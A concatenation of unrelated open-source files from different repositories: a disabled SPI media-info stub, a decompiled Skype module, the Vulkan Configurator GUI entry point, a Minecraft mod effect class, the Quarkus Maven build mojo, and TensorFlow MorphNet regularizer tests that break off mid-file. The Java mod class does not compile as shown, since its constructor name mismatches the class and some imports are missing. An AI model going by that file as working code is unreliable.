  @param[out] DevBlockInfo   The Block Io information of the SPI device.

  @retval EFI_SUCCESS        The Block Io information about the specified block device
                             was obtained successfully.
  @retval EFI_UNSUPPORTED    The call is unsupported.
  @retval EFI_DEVICE_ERROR   Cannot get the media information due to a hardware
                             error.
**/
EFI_STATUS
EFIAPI
SpiGetMediaInfo (
  UINTN                          RegionType,
  DEVICE_BLOCK_INFO              *DevBlockInfo
  )
{
  // This Lib will only support Images in PDR region
  // And need minor update this lib to support it.
  // NOTE(review): the implementation below is intentionally disabled; this
  // function currently always returns EFI_UNSUPPORTED.
  return EFI_UNSUPPORTED;

#if 0
  EFI_STATUS                     Status;
  UINT32                         FlashBase;
  UINT32                         FlashSize;

  if (mSpiService == NULL) {
    return EFI_UNSUPPORTED;
  }

  if (DevBlockInfo == NULL) {
    return EFI_INVALID_PARAMETER;
  }

  Status = mSpiService->SpiGetRegion (FlashRegionAll, &FlashBase, &FlashSize);

  DevBlockInfo->BlockNum  = ((FlashSize % SPI_BLOCK_SIZE) == 0) ? FlashSize / SPI_BLOCK_SIZE : (FlashSize / SPI_BLOCK_SIZE) + 1;
  DevBlockInfo->BlockSize = SPI_BLOCK_SIZE;

  return Status;
#endif
}
demurgos/skype-web-reversed
skype/latest/decompiled/fullExperience/rjs$$ui/components/chat/recentItem.js
define("ui/components/chat/recentItem", [ "require", "exports", "module", "constants/components", "text!views/chat/timeline/recentItem.html" ], function (e, t) { t.name = e("constants/components").chat.RECENT_ITEM; t.template = e("text!views/chat/timeline/recentItem.html"); });
johnzupin/VulkanTools
vkconfig/main_gui.cpp
/*
 * Copyright (c) 2020 Valve Corporation
 * Copyright (c) 2020 LunarG, Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 *
 * Authors:
 * - <NAME> <<EMAIL>>
 */

#include "main_gui.h"
#include "mainwindow.h"

#include "../vkconfig_core/version.h"
#include "../vkconfig_core/application_singleton.h"

#include <QApplication>
#include <QCheckBox>
#include <QMessageBox>

// Entry point for the Vulkan Configurator GUI.
// Returns the Qt event-loop exit code, or -1 when startup fails (another
// instance already running, or no Vulkan layers found).
int run_gui(int argc, char* argv[]) {
    QCoreApplication::setOrganizationName("LunarG");
    QCoreApplication::setOrganizationDomain("lunarg.com");

    // This is used by QSettings for .ini, registry, and .plist files.
    // It needs to not have spaces in it, and by default is the same as
    // the executable name. If we rename the executable at a later date,
    // keeping this as 'vkconfig' will ensure that it picks up the
    // settings from the previous version (assuming that's ever an issue)
    QCoreApplication::setApplicationName(VKCONFIG_SHORT_NAME);

    // High-DPI support was introduced in Qt 5.6.0, and the attribute
    // enumerant is applied dynamically so older Qt headers still compile.
    // Initialize to 0 so a failed sscanf parse leaves the check false.
    const char* version = qVersion();
    int version_major = 0, version_minor = 0;
    sscanf(version, "%d.%d", &version_major, &version_minor);

    // FIX: the old test (major >= 5 && minor >= 6) wrongly rejected
    // Qt 6.0 through 6.5, whose minor version is below 6. Accept any
    // version >= 5.6.
    if (version_major > 5 || (version_major == 5 && version_minor >= 6)) {
        // Qt::AA_EnableHighDpiScaling = 20 from qnamespace.h in Qt 5.6 or later
        QCoreApplication::setAttribute((Qt::ApplicationAttribute)20);
    }

    QApplication app(argc, argv);

    // This has to go after the construction of QApplication in
    // order to use a QMessageBox and avoid some QThread warnings.
    const ApplicationSingleton singleton("vkconfig_single_instance");
    if (!singleton.IsFirstInstance()) {
        QMessageBox alert(nullptr);
        alert.setWindowTitle("Cannot start another instance of vkconfig");
        alert.setIcon(QMessageBox::Critical);
        alert.setText("Another copy of vkconfig is currently running. Please close the other instance and try again.");
        alert.exec();
        return -1;
    }

    // We simply cannot run without any layers
    if (Configurator::Get().Init() == false) return -1;

    // The main GUI is driven here
    MainWindow main_window;
    main_window.show();

    return app.exec();
}
SDF-Bramble/Artifacts-Reloaded
artifactsreloaded/common/components/effects/CAirwalk.java
package archived.artifactsreloaded.common.components.effects; import java.util.List; import java.util.Random; import net.minecraft.entity.Entity; import net.minecraft.entity.player.EntityPlayer; import net.minecraft.item.ItemStack; import net.minecraft.world.World; import archived.artifactsreloaded.common.components.BaseComponent; public class CAirwalk extends BaseComponent { public CAirWalk() { } public String getRandomTrigger(Random rand, boolean isArmor) { if(!isArmor) { return "onHeld"; } else { return "onArmorTickUpdate"; } } public void addInformation(ItemStack itemStack, EntityPlayer player, List list, String trigger, boolean advTooltip) { list.add(StatCollector.translateToLocal("effect.Allows sneaking on air") + " " + StatCollector.translateToLocal("tool."+trigger)); } @Override public void addInformation(ItemStack itemStack, EntityPlayer player, List list, boolean advTooltip) { list.add(StatCollector.translateToLocal("effect.Allows sneaking on air")); } @Override public void onHeld(ItemStack itemStack, World world, Entity entity, int par4, boolean par5) { //Similar to the ComponentLight code. Sets the block beneath the player to solid air, //and cleans up any solid air blocks that were there before. if(entity instanceof EntityPlayer) { EntityPlayer player = (EntityPlayer) entity; if(player.isSneaking()) { int lastX = itemStack.stackTagCompound.getInteger("lastAirX"); int lastY = itemStack.stackTagCompound.getInteger("lastAirY"); int lastZ = itemStack.stackTagCompound.getInteger("lastAirZ"); int newX = MathHelper.floor_double(entity.posX); int newY = MathHelper.floor_double(entity.posY-1); int newZ = MathHelper.floor_double(entity.posZ); //If the player isn't standing on solid air, set the block beneath their feet so solid air. 
if(world.getBlock(newX, newY, newZ) != BlockSolidAir.instance) { if(lastY >= 0 && lastY < 256 && world.getBlock(lastX, lastY, lastZ) == BlockSolidAir.instance) { //System.out.println("Setting solid air at x="+lastX+", y="+lastY+", z="+lastZ+" to air."); world.setBlockToAir(lastX, lastY, lastZ); } if(newY >= 0 && newY < 256 && world.isAirBlock(newX, newY, newZ)) { //System.out.println("Creating solid air at x="+newX+", y="+newY+", z="+newZ+"."); boolean worked = world.setBlock(newX, newY, newZ, BlockSolidAir.instance); if(!DragonArtifacts.airWalkSpam) { }else { System.out.println(worked); } itemStack.stackTagCompound.setInteger("lastAirX",newX); itemStack.stackTagCompound.setInteger("lastAirY",newY); itemStack.stackTagCompound.setInteger("lastAirZ",newZ); } } } else { //Clean up left-over blocks. //Only happens when player is holding the artifact, so they will disappear like leaves otherwise. int lastX = itemStack.stackTagCompound.getInteger("lastAirX"); int lastY = itemStack.stackTagCompound.getInteger("lastAirY"); int lastZ = itemStack.stackTagCompound.getInteger("lastAirZ"); if(lastY != -1 && lastY >= 0 && lastY < 256 && world.getBlock(lastX, lastY, lastZ) == BlockSolidAir.instance) { //System.out.println("Player is no longer shifting. 
Setting x="+lastX+", y="+lastY+", z="+lastZ+" to air."); world.setBlockToAir(lastX, lastY, lastZ); itemStack.stackTagCompound.setInteger("lastAirY",-1); } } } } @Override public void onArmorTickUpdate(World world, EntityPlayer player, ItemStack itemStack, boolean worn) { if(worn) onHeld(itemStack, world, player, 0, true); } @Override public String getPreAdj(Random rand) { String str = ""; switch(rand.nextInt(2)) { case 0: str = "Floating"; break; case 1: str = "Light"; break; } return str; } @Override public String getPostAdj(Random rand) { String str = ""; switch(rand.nextInt(2)) { case 0: str = "of Hermes"; break; case 1: str = "of Flight"; break; } return str; } @Override public int getTextureBitflags() { return Flags.AMULET | Flags.RING | Flags.STAFF | Flags.TRINKET | Flags.WAND | Flags.ARMOR | Flags.BOOTS; } @Override public int getNegTextureBitflags() { return Flags.DAGGER | Flags.SWORD | Flags.FIGURINE | Flags.HELM | Flags.BELT; } }
PieterjanDeconinck/quarkus
devtools/maven/src/main/java/io/quarkus/maven/BuildMojo.java
<filename>devtools/maven/src/main/java/io/quarkus/maven/BuildMojo.java package io.quarkus.maven; import java.io.File; import java.util.List; import java.util.Properties; import org.apache.maven.artifact.Artifact; import org.apache.maven.plugin.AbstractMojo; import org.apache.maven.plugin.MojoExecutionException; import org.apache.maven.plugins.annotations.Component; import org.apache.maven.plugins.annotations.LifecyclePhase; import org.apache.maven.plugins.annotations.Mojo; import org.apache.maven.plugins.annotations.Parameter; import org.apache.maven.plugins.annotations.ResolutionScope; import org.apache.maven.project.MavenProject; import org.apache.maven.project.MavenProjectHelper; import org.eclipse.aether.RepositorySystem; import org.eclipse.aether.RepositorySystemSession; import org.eclipse.aether.repository.RemoteRepository; import io.quarkus.bootstrap.app.AugmentAction; import io.quarkus.bootstrap.app.AugmentResult; import io.quarkus.bootstrap.app.CuratedApplication; import io.quarkus.bootstrap.app.QuarkusBootstrap; import io.quarkus.bootstrap.model.AppArtifact; import io.quarkus.bootstrap.resolver.maven.MavenArtifactResolver; /** * Build the application. * <p> * You can build a native application runner with {@code native-image} * * @author <NAME> */ @Mojo(name = "build", defaultPhase = LifecyclePhase.PACKAGE, requiresDependencyResolution = ResolutionScope.COMPILE_PLUS_RUNTIME, threadSafe = true) public class BuildMojo extends AbstractMojo { protected static final String QUARKUS_PACKAGE_UBER_JAR = "quarkus.package.uber-jar"; /** * The entry point to Aether, i.e. the component doing all the work. * * @component */ @Component private RepositorySystem repoSystem; @Component private MavenProjectHelper projectHelper; /** * The current repository/network configuration of Maven. 
* * @parameter default-value="${repositorySystemSession}" * @readonly */ @Parameter(defaultValue = "${repositorySystemSession}", readonly = true) private RepositorySystemSession repoSession; /** * The project's remote repositories to use for the resolution of artifacts and their dependencies. * * @parameter default-value="${project.remoteProjectRepositories}" * @readonly */ @Parameter(defaultValue = "${project.remoteProjectRepositories}", readonly = true, required = true) private List<RemoteRepository> repos; /** * The project's remote repositories to use for the resolution of plugins and their dependencies. * * @parameter default-value="${project.remotePluginRepositories}" * @readonly */ @Parameter(defaultValue = "${project.remotePluginRepositories}", readonly = true, required = true) private List<RemoteRepository> pluginRepos; /** * The directory for compiled classes. */ @Parameter(readonly = true, required = true, defaultValue = "${project.build.outputDirectory}") private File outputDirectory; @Parameter(defaultValue = "${project}", readonly = true, required = true) protected MavenProject project; /** * The directory for generated source files. */ @Parameter(defaultValue = "${project.build.directory}/generated-sources") private File generatedSourcesDirectory; @Parameter(defaultValue = "${project.build.directory}") private File buildDir; @Parameter(defaultValue = "${project.build.finalName}") private String finalName; @Parameter(property = "uberJar", defaultValue = "false") private boolean uberJar; /** * When using the uberJar option, this array specifies entries that should * be excluded from the final jar. The entries are relative to the root of * the file. 
An example of this configuration could be: * <code><pre> * &#x3C;configuration&#x3E; * &#x3C;uberJar&#x3E;true&#x3C;/uberJar&#x3E; * &#x3C;ignoredEntries&#x3E; * &#x3C;ignoredEntry&#x3E;META-INF/BC2048KE.SF&#x3C;/ignoredEntry&#x3E; * &#x3C;ignoredEntry&#x3E;META-INF/BC2048KE.DSA&#x3C;/ignoredEntry&#x3E; * &#x3C;ignoredEntry&#x3E;META-INF/BC1024KE.SF&#x3C;/ignoredEntry&#x3E; * &#x3C;ignoredEntry&#x3E;META-INF/BC1024KE.DSA&#x3C;/ignoredEntry&#x3E; * &#x3C;/ignoredEntries&#x3E; * &#x3C;/configuration&#x3E; * </pre></code> */ @Parameter(property = "ignoredEntries") private String[] ignoredEntries; /** Skip the execution of this mojo */ @Parameter(defaultValue = "false", property = "quarkus.build.skip") private boolean skip = false; public BuildMojo() { MojoLogger.logSupplier = this::getLog; } @Override public void execute() throws MojoExecutionException { if (project.getPackaging().equals("pom")) { getLog().info("Type of the artifact is POM, skipping build goal"); return; } if (skip) { getLog().info("Skipping Quarkus build"); return; } boolean clear = false; try { final Properties projectProperties = project.getProperties(); final Properties realProperties = new Properties(); for (String name : projectProperties.stringPropertyNames()) { if (name.startsWith("quarkus.")) { realProperties.setProperty(name, projectProperties.getProperty(name)); } } if (uberJar && System.getProperty(QUARKUS_PACKAGE_UBER_JAR) == null) { System.setProperty(QUARKUS_PACKAGE_UBER_JAR, "true"); clear = true; } realProperties.putIfAbsent("quarkus.application.name", project.getArtifactId()); realProperties.putIfAbsent("quarkus.application.version", project.getVersion()); MavenArtifactResolver resolver = MavenArtifactResolver.builder() .setRepositorySystem(repoSystem) .setRepositorySystemSession(repoSession) .setRemoteRepositories(repos) .build(); final Artifact projectArtifact = project.getArtifact(); final AppArtifact appArtifact = new AppArtifact(projectArtifact.getGroupId(), 
projectArtifact.getArtifactId(), projectArtifact.getClassifier(), projectArtifact.getArtifactHandler().getExtension(), projectArtifact.getVersion()); CuratedApplication curatedApplication = QuarkusBootstrap.builder(outputDirectory.toPath()) .setAppArtifact(appArtifact) .setProjectRoot(project.getBasedir().toPath()) .setMavenArtifactResolver(resolver) .setBaseClassLoader(BuildMojo.class.getClassLoader()) .setBuildSystemProperties(realProperties) .setLocalProjectDiscovery(false) .setBaseName(finalName) .setTargetDirectory(buildDir.toPath()) .build().bootstrap(); AugmentAction action = curatedApplication.createAugmentor(); AugmentResult result = action.createProductionApplication(); Artifact original = project.getArtifact(); if (result.getJar() != null) { if (result.getJar().isUberJar() && result.getJar().getOriginalArtifact() != null) { original.setFile(result.getJar().getOriginalArtifact().toFile()); } if (result.getJar().isUberJar()) { projectHelper.attachArtifact(project, result.getJar().getPath().toFile(), "runner"); } } } catch (Exception e) { throw new MojoExecutionException("Failed to build quarkus application", e); } finally { if (clear) { System.clearProperty(QUARKUS_PACKAGE_UBER_JAR); } } } }
zcdzcdzcd/models
research/morph_net/network_regularizers/flop_regularizer_test.py
<gh_stars>10-100 # Copyright 2018 The TensorFlow Authors All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for flop_regularizer.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import abc import numpy as np import tensorflow as tf from tensorflow.contrib.slim.nets import resnet_v1 from morph_net.network_regularizers import bilinear_cost_utils from morph_net.network_regularizers import flop_regularizer arg_scope = tf.contrib.framework.arg_scope layers = tf.contrib.layers _coeff = bilinear_cost_utils.flop_coeff NUM_CHANNELS = 3 class GammaFlopLossTest(tf.test.TestCase): def setUp(self): tf.reset_default_graph() self.BuildWithBatchNorm() with self.test_session(): self.Init() def BuildWithBatchNorm(self): params = { 'trainable': True, 'normalizer_fn': layers.batch_norm, 'normalizer_params': { 'scale': True } } with arg_scope([layers.conv2d], **params): self.BuildModel() def BuildModel(self): # Our test model is: # # -> conv1 --+ -> conv3 --> # / | / # image [concat] # \ | \ # -> conv2 --+ -> conv4 --> # # (the model has two "outputs", conv3 and conv4). 
# image = tf.constant(0.0, shape=[1, 17, 19, NUM_CHANNELS]) conv1 = layers.conv2d(image, 13, [7, 5], padding='SAME', scope='conv1') conv2 = layers.conv2d(image, 23, [1, 1], padding='SAME', scope='conv2') concat = tf.concat([conv1, conv2], 3) self.conv3 = layers.conv2d( concat, 29, [3, 3], stride=2, padding='SAME', scope='conv3') self.conv4 = layers.conv2d( concat, 31, [1, 1], stride=1, padding='SAME', scope='conv4') self.name_to_var = {v.op.name: v for v in tf.global_variables()} self.gamma_flop_reg = flop_regularizer.GammaFlopsRegularizer( [self.conv3.op, self.conv4.op], gamma_threshold=0.45) def GetConv(self, name): return tf.get_default_graph().get_operation_by_name(name + '/Conv2D') def Init(self): tf.global_variables_initializer().run() gamma1 = self.name_to_var['conv1/BatchNorm/gamma'] gamma1.assign([0.8] * 7 + [0.2] * 6).eval() gamma2 = self.name_to_var['conv2/BatchNorm/gamma'] gamma2.assign([-0.7] * 11 + [0.1] * 12).eval() gamma3 = self.name_to_var['conv3/BatchNorm/gamma'] gamma3.assign([0.6] * 10 + [-0.3] * 19).eval() gamma4 = self.name_to_var['conv4/BatchNorm/gamma'] gamma4.assign([-0.5] * 17 + [-0.4] * 14).eval() def cost(self, conv): with self.test_session(): return self.gamma_flop_reg.get_cost(conv).eval() def loss(self, conv): with self.test_session(): return self.gamma_flop_reg.get_regularization_term(conv).eval() def testCost(self): # Conv1 has 7 gammas above 0.45, and NUM_CHANNELS inputs (from the image). conv = self.GetConv('conv1') self.assertEqual(_coeff(conv) * 7 * NUM_CHANNELS, self.cost([conv])) # Conv2 has 11 gammas above 0.45, and NUM_CHANNELS inputs (from the image). conv = self.GetConv('conv2') self.assertEqual(_coeff(conv) * 11 * NUM_CHANNELS, self.cost([conv])) # Conv3 has 10 gammas above 0.45, and 7 + 11 inputs from conv1 and conv2. conv = self.GetConv('conv3') self.assertEqual(_coeff(conv) * 10 * 18, self.cost([conv])) # Conv4 has 17 gammas above 0.45, and 7 + 11 inputs from conv1 and conv2. 
conv = self.GetConv('conv4') self.assertEqual(_coeff(conv) * 17 * 18, self.cost([conv])) # Test that passing a list of convs sums their contributions: convs = [self.GetConv('conv3'), self.GetConv('conv4')] self.assertEqual( self.cost(convs[:1]) + self.cost(convs[1:]), self.cost(convs)) class GammaFlopLossWithDepthwiseConvTestBase(object): """Test flop_regularizer for a network with depthwise convolutions.""" __metaclass__ = abc.ABCMeta @abc.abstractmethod def GetSession(self): return def BuildWithBatchNorm(self): params = { 'trainable': True, 'normalizer_fn': layers.batch_norm, 'normalizer_params': { 'scale': True } } ops_with_batchnorm = [layers.conv2d] if self._depthwise_use_batchnorm: ops_with_batchnorm.append(layers.separable_conv2d) with arg_scope(ops_with_batchnorm, **params): self.BuildModel() def BuildModel(self): # Our test model is: # # -> dw1 --> conv1 --+ # / | # image [concat] --> conv3 # \ | # -> conv2 --> dw2 --+ # # (the model has one "output", conv3). # image = tf.constant(0.0, shape=[1, 17, 19, NUM_CHANNELS]) dw1 = layers.separable_conv2d( image, None, [3, 3], depth_multiplier=1, stride=1, scope='dw1') conv1 = layers.conv2d(dw1, 13, [7, 5], padding='SAME', scope='conv1') conv2 = layers.conv2d(image, 23, [1, 1], padding='SAME', scope='conv2') dw2 = layers.separable_conv2d( conv2, None, [5, 5], depth_multiplier=1, stride=1, scope='dw2') concat = tf.concat([conv1, dw2], 3) self.conv3 = layers.conv2d( concat, 29, [3, 3], stride=2, padding='SAME', scope='conv3') self.name_to_var = {v.op.name: v for v in tf.global_variables()} self.gamma_flop_reg = flop_regularizer.GammaFlopsRegularizer( [self.conv3.op], gamma_threshold=0.45) def GetConv(self, name): return tf.get_default_graph().get_operation_by_name( name + ('/Conv2D' if 'conv' in name else '/depthwise')) def GetGammaAbsValue(self, name): gamma_op = tf.get_default_graph().get_operation_by_name(name + '/BatchNorm/gamma') with self.GetSession(): # pylint: disable=not-context-manager gamma = 
gamma_op.outputs[0].eval() return np.abs(gamma) def Init(self): tf.global_variables_initializer().run() gamma1 = self.name_to_var['conv1/BatchNorm/gamma'] gamma1.assign([0.8] * 7 + [0.2] * 6).eval() gamma2 = self.name_to_var['conv2/BatchNorm/gamma'] gamma2.assign([-0.7] * 11 + [0.1] * 12).eval() gamma3 = self.name_to_var['conv3/BatchNorm/gamma'] gamma3.assign([0.6] * 10 + [-0.3] * 19).eval() # Initialize gamma for depthwise convs only if there are Batchnorm for them. if self._depthwise_use_batchnorm: gammad1 = self.name_to_var['dw1/BatchNorm/gamma'] gammad1.assign([-0.3] * 1 + [-0.9] * 2).eval() gammad2 = self.name_to_var['dw2/BatchNorm/gamma'] gammad2.assign([0.3] * 5 + [0.9] * 10 + [-0.1] * 8).eval() def cost(self, conv): # pylint: disable=invalid-name with self.GetSession(): # pylint: disable=not-context-manager cost = self.gamma_flop_reg.get_cost(conv) return cost.eval() if isinstance(cost, tf.Tensor) else cost def loss(self, conv): # pylint: disable=invalid-name with self.GetSession(): # pylint: disable=not-context-manager reg = self.gamma_flop_reg.get_regularization_term(conv) return reg.eval() if isinstance(reg, tf.Tensor) else reg class GammaFlopLossWithDepthwiseConvTest( tf.test.TestCase, GammaFlopLossWithDepthwiseConvTestBase): """Test flop_regularizer for a network with depthwise convolutions.""" def setUp(self): self._depthwise_use_batchnorm = True tf.reset_default_graph() self.BuildWithBatchNorm() with self.test_session(): self.Init() def GetSession(self): return self.test_session() def testCost(self): # Dw1 has 2 gammas above 0.45 out of NUM_CHANNELS inputs (from the image), # but because the input doesn't have a regularizer, it has no way of # removing the channels, so the channel count is still NUM_CHANNELS. conv = self.GetConv('dw1') self.assertEqual(_coeff(conv) * NUM_CHANNELS, self.cost([conv])) # Conv1 has 7 gammas above 0.45, and NUM_CHANNELS inputs (from dw1). 
conv = self.GetConv('conv1') self.assertEqual(_coeff(conv) * 7 * NUM_CHANNELS, self.cost([conv])) # Conv2 has 11 active + 12 inactive, while Dw2 has 5 inactive, 10 active and # 8 active. Their max (or) has 15 active and 8 inactive. # Conv2 has NUM_CHANNELS inputs (from the image). conv = self.GetConv('conv2') self.assertEqual(_coeff(conv) * 15 * NUM_CHANNELS, self.cost([conv])) # Dw2 has 15 out of 23 inputs (from the Conv2). conv = self.GetConv('dw2') self.assertEqual(_coeff(conv) * 15, self.cost([conv])) # Conv3 has 10 gammas above 0.45, and 7 + 15 inputs from conv1 and dw2. conv = self.GetConv('conv3') self.assertEqual(_coeff(conv) * 10 * 22, self.cost([conv])) def testRegularizer(self): # Dw1 depthwise convolution is connected to the input (no regularizer). conv = self.GetConv('dw1') # Although the effective regularizer for dw is computed as below: # gamma = self.GetGammaAbsValue('dw1') # expected_loss = _coeff(conv) * gamma.sum() # Since the input is not regularized, dw does not return a regularizer. expected_loss = 0.0 self.assertNear(expected_loss, self.loss([conv]), expected_loss * 1e-5) # Conv1 takes Dw1 as input, its input regularizer is from dw1. conv = self.GetConv('conv1') gamma = self.GetGammaAbsValue('conv1') # The effective size for dw can be computed from its gamma, and # the loss may be computed as follows: # gamma_dw = self.GetGammaAbsValue('dw1') # expected_loss = _coeff(conv) * ( # gamma.sum() * (gamma_dw > 0.45).sum() + gamma_dw.sum() * # (gamma > 0.45).sum()) # However, since dw cannot change shape because its input doesn't have a # regularizer, the real loss we expect should be: expected_loss = _coeff(conv) * (gamma.sum() * NUM_CHANNELS) self.assertNear(expected_loss, self.loss([conv]), expected_loss * 1e-5) # Dw2 depthwise convolution is connected to conv2 (grouped regularizer). 
conv = self.GetConv('conv2') gamma_conv = self.GetGammaAbsValue('conv2') dw = self.GetConv('dw2') gamma_dw = self.GetGammaAbsValue('dw2') gamma = np.maximum(gamma_dw, gamma_conv).sum() expected_loss = _coeff(conv) * (gamma * 3 + (gamma > 0.45).sum() * 0) self.assertNear(expected_loss, self.loss([conv]), expected_loss * 1e-5) expected_loss = _coeff(dw) * gamma * 2 self.assertNear(expected_loss, self.loss([dw]), expected_loss * 1e-5) class GammaFlopLossWithDepthwiseConvNoBatchNormTest( tf.test.TestCase, GammaFlopLossWithDepthwiseConvTestBase): """Test flop_regularizer for un-batchnormed depthwise convolutions. This test is used to confirm that when depthwise convolution is not BNed, it will not be considered towards the regularizer, but it will be counted towards the cost. This design choice is for backward compatibility for users who did not regularize depthwise convolutions. However, the cost will be reported regardless in order to be faithful to the real computation complexity. """ def setUp(self): self._depthwise_use_batchnorm = False tf.reset_default_graph() self.BuildWithBatchNorm() with self.test_session(): self.Init() def GetSession(self): return self.test_session() def testCost(self): # Dw1 has NUM_CHANNELS inputs (from the image). conv = self.GetConv('dw1') self.assertEqual(_coeff(conv) * 3, self.cost([conv])) # Conv1 has 7 gammas above 0.45, and 3 inputs (from dw1). conv = self.GetConv('conv1') self.assertEqual(_coeff(conv) * 7 * 3, self.cost([conv])) # Conv2 has 11 active outputs and NUM_CHANNELS inputs (from the image). conv = self.GetConv('conv2') self.assertEqual(_coeff(conv) * 11 * NUM_CHANNELS, self.cost([conv])) # Dw2 has 11 inputs (pass-through from the Conv2). conv = self.GetConv('dw2') self.assertEqual(_coeff(conv) * 11, self.cost([conv])) # Conv3 has 10 gammas above 0.45, and 7 + 11 inputs from conv1 and dw2. 
conv = self.GetConv('conv3') self.assertEqual(_coeff(conv) * 10 * 18, self.cost([conv])) def testRegularizer(self): # Dw1 depthwise convolution is connected to the input (no regularizer). conv = self.GetConv('dw1') expected_loss = 0.0 self.assertNear(expected_loss, self.loss([conv]), expected_loss * 1e-5) # Conv1 takes Dw1 as input, but it's not affected by dw1 because depthwise # is not BNed. conv = self.GetConv('conv1') gamma = self.GetGammaAbsValue('conv1') expected_loss = _coeff(conv) * (gamma.sum() * NUM_CHANNELS) self.assertNear(expected_loss, self.loss([conv]), expected_loss * 1e-5) # Dw2 depthwise convolution is connected to conv2 (pass through). dw = self.GetConv('dw2') gamma = self.GetGammaAbsValue('conv2') expected_loss = _coeff(dw) * gamma.sum() * 2 self.assertNear(expected_loss, self.loss([dw]), expected_loss * 1e-5) class GammaFlopResidualConnectionsLossTest(tf.test.TestCase): """Tests flop_regularizer for a network with residual connections.""" def setUp(self): tf.reset_default_graph() tf.set_random_seed(7) self._threshold = 0.6 def buildModel(self, resnet_fn, block_fn): # We use this model as a test case because the slim.nets.resnet module is # used in some production. # # The model looks as follows: # # Image --> unit_1/shortcut # Image --> unit_1/conv1 --> unit_1/conv2 --> unit_1/conv3 # # unit_1/shortcut + unit_1/conv3 --> unit_1 (residual connection) # # unit_1 --> unit_2/conv1 -> unit_2/conv2 --> unit_2/conv3 # # unit_1 + unit_2/conv3 --> unit_2 (residual connection) # # In between, there are strided convolutions and pooling ops, but these # should not affect the regularizer. 
blocks = [ block_fn('block1', base_depth=7, num_units=2, stride=2), ] image = tf.constant(0.0, shape=[1, 2, 2, NUM_CHANNELS]) net = resnet_fn( image, blocks, include_root_block=False, is_training=False)[0] net = tf.reduce_mean(net, axis=(1, 2)) return layers.fully_connected(net, 23, scope='FC') def buildGraphWithBatchNorm(self, resnet_fn, block_fn): params = { 'trainable': True, 'normalizer_fn': layers.batch_norm, 'normalizer_params': { 'scale': True } } with arg_scope([layers.conv2d, layers.separable_conv2d], **params): self.net = self.buildModel(resnet_fn, block_fn) def initGamma(self): assignments = [] gammas = {} for v in tf.global_variables(): if v.op.name.endswith('/gamma'): assignments.append(v.assign(tf.random_uniform(v.shape))) gammas[v.op.name] = v with self.test_session() as s: s.run(assignments) self._gammas = s.run(gammas) def getGamma(self, short_name): tokens = short_name.split('/') name = ('resnet_v1/block1/' + tokens[0] + '/bottleneck_v1/' + tokens[1] + '/BatchNorm/gamma') return self._gammas[name] def getOp(self, short_name): if short_name == 'FC': return tf.get_default_graph().get_operation_by_name('FC/MatMul') tokens = short_name.split('/') name = ('resnet_v1/block1/' + tokens[0] + '/bottleneck_v1/' + tokens[1] + '/Conv2D') return tf.get_default_graph().get_operation_by_name(name) def numAlive(self, short_name): return np.sum(self.getGamma(short_name) > self._threshold) def getCoeff(self, short_name): return _coeff(self.getOp(short_name)) def testCost(self): self.buildGraphWithBatchNorm(resnet_v1.resnet_v1, resnet_v1.resnet_v1_block) self.initGamma() res_alive = np.logical_or( np.logical_or( self.getGamma('unit_1/shortcut') > self._threshold, self.getGamma('unit_1/conv3') > self._threshold), self.getGamma('unit_2/conv3') > self._threshold) self.gamma_flop_reg = flop_regularizer.GammaFlopsRegularizer( [self.net.op], self._threshold) expected = {} expected['unit_1/shortcut'] = ( self.getCoeff('unit_1/shortcut') * np.sum(res_alive) * NUM_CHANNELS) 
expected['unit_1/conv1'] = ( self.getCoeff('unit_1/conv1') * self.numAlive('unit_1/conv1') * NUM_CHANNELS) expected['unit_1/conv2'] = ( self.getCoeff('unit_1/conv2') * self.numAlive('unit_1/conv2') * self.numAlive('unit_1/conv1')) expected['unit_1/conv3'] = ( self.getCoeff('unit_1/conv3') * np.sum(res_alive) * self.numAlive('unit_1/conv2')) expected['unit_2/conv1'] = ( self.getCoeff('unit_2/conv1') * self.numAlive('unit_2/conv1') * np.sum(res_alive)) expected['unit_2/conv2'] = ( self.getCoeff('unit_2/conv2') * self.numAlive('unit_2/conv2') * self.numAlive('unit_2/conv1')) expected['unit_2/conv3'] = ( self.getCoeff('unit_2/conv3') * np.sum(res_alive) * self.numAlive('unit_2/conv2')) expected['FC'] = 2.0 * np.sum(res_alive) * 23.0 # TODO: Is there a way to use Parametrized Tests to make this more # elegant? with self.test_session(): for short_name in expected: cost = self.gamma_flop_reg.get_cost([self.getOp(short_name)]).eval() self.assertEqual(expected[short_name], cost) self.assertEqual( sum(expected.values()), self.gamma_flop_reg.get_cost().eval()) class GroupLassoFlopRegTest(tf.test.TestCase): def assertNearRelatively(self, expected, actual): self.assertNear(expected, actual, expected * 1e-6) def testFlopRegularizer(self): tf.reset_default_graph() tf.set_random_seed(7907) with arg_scope( [layers.conv2d, layers.conv2d_transpose], weights_initializer=tf.random_normal_initializer): # Our test model is: # # -> conv1 --+ # / |--[concat] # image --> conv2 --+ # \ # -> convt # # (the model has two "outputs", convt and concat). 
